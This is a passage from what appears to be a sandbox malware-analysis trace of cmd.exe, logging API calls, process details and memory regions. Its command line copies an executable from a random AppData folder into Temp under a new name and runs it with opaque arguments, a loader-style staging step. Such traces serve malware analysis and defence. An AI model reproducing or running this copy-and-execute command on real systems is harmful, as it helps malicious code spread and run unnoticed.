lpConsoleScreenBufferInfo=0x16e930 | out: lpConsoleScreenBufferInfo=0x16e930) returned 1 [0173.906] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.906] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e970 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.906] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x16e954, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e954*=0x1a) returned 1 [0173.906] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.906] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.907] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.907] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.907] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.907] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.907] SetConsoleInputExeNameW () returned 0x1 [0173.907] GetConsoleOutputCP () returned 0x1b5 [0173.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.907] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.907] exit (_Code=0) Process: id = "306" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23732 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23733 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23734 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23735 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23736 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23737 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23738 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23739 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23740 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23741 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23916 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23917 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23918 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23919 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 23920 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 23921 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23922 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23923 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23924 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23925 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23926 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23927 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23928 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23929 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23930 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 23931 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23932 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23933 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23934 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 23935 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 23936 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23937 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23938 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename 
= "" Region: id = 23939 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 23950 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 408 os_tid = 0x968 [0174.017] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0x9d9f2ba0, dwHighDateTime=0x1d440a9)) [0174.017] GetCurrentProcessId () returned 0xaa0 [0174.017] GetCurrentThreadId () returned 0x968 [0174.017] GetTickCount () returned 0x32a3a [0174.017] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=23080604308) returned 1 [0174.017] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0174.017] __set_app_type (_Type=0x1) [0174.017] __p__fmode () returned 0x76b331f4 [0174.017] __p__commode () returned 0x76b331fc [0174.018] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0174.018] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0174.018] GetCurrentThreadId () returned 0x968 [0174.018] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x968) returned 0x38 [0174.018] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.018] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0174.018] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.018] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.018] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", 
ulOptions=0x0, samDesired=0x20019, phkResult=0x18feec | out: phkResult=0x18feec*=0x0) returned 0x2 [0174.018] VirtualQuery (in: lpAddress=0x18ff23, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.018] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18febc, dwLength=0x1c | out: lpBuffer=0x18febc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0174.018] GetConsoleOutputCP () returned 0x1b5 [0174.019] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.019] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0174.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.019] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 
[0174.019] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.019] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0174.019] _get_osfhandle (_FileHandle=0) returned 0x3 [0174.019] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0174.019] GetEnvironmentStringsW () returned 0x330370* [0174.020] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.020] GetEnvironmentStringsW () returned 0x330370* [0174.020] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee5c | out: phkResult=0x18ee5c*=0x40) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x20, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x0, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegCloseKey (hKey=0x40) returned 0x0 [0174.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee5c | out: phkResult=0x18ee5c*=0x40) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x40, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x1, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x0, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee64, 
lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x4, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x4) returned 0x0 [0174.020] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee64, lpData=0x18ee68, lpcbData=0x18ee60*=0x1000 | out: lpType=0x18ee64*=0x0, lpData=0x18ee68*=0x9, lpcbData=0x18ee60*=0x1000) returned 0x2 [0174.020] RegCloseKey (hKey=0x40) returned 0x0 [0174.021] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0174.021] srand (_Seed=0x5b886389) [0174.021] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.021] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.021] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.021] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0174.021] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0174.021] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 
0x35 [0174.021] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0174.021] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0174.021] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0174.021] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0174.021] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0174.021] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0174.022] GetEnvironmentStringsW () returned 0x3324c0* [0174.022] FreeEnvironmentStringsW (penv=0x3324c0) returned 1 [0174.022] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.022] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0174.022] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0174.022] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0174.022] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0174.022] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0174.022] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0174.022] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0174.022] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fc28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 
lpBuffer=0x18fc28, lpFilePart=0x18fc24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fc24*="Desktop") returned 0x18 [0174.022] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.022] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.022] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.022] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f9a4 | out: lpFindFileData=0x18f9a4) returned 0x330b50 [0174.023] FindClose (in: hFindFile=0x330b50 | out: hFindFile=0x330b50) returned 1 [0174.023] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0174.023] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0174.023] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0174.023] GetEnvironmentStringsW () returned 0x330370* [0174.023] FreeEnvironmentStringsW (penv=0x330370) returned 1 [0174.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0174.023] GetConsoleOutputCP () returned 0x1b5 [0174.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0174.023] GetUserDefaultLCID () returned 0x409 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd68, cchData=128 | out: lpLCData="0") returned 2 [0174.024] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd68, cchData=128 | out: lpLCData="0") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd68, cchData=128 | out: lpLCData="1") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0174.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0174.024] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0174.025] GetConsoleTitleW (in: lpConsoleTitle=0x320a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.025] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0174.025] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0174.025] GetProcAddress 
(hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0174.026] _wcsicmp (_String1="type", _String2=")") returned 75 [0174.026] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0174.026] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0174.026] _wcsicmp (_String1="IF", _String2="type") returned -11 [0174.026] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0174.026] _wcsicmp (_String1="REM", _String2="type") returned -2 [0174.026] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0174.030] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 68 [0174.030] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 68 [0174.030] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 71 [0174.030] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 71 [0174.030] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 80 [0174.030] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\"") returned 80 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0174.032] GetFileType (hFile=0x7) returned 0x2 [0174.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.032] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fbfc | out: lpMode=0x18fbfc) returned 1 [0174.033] _dup 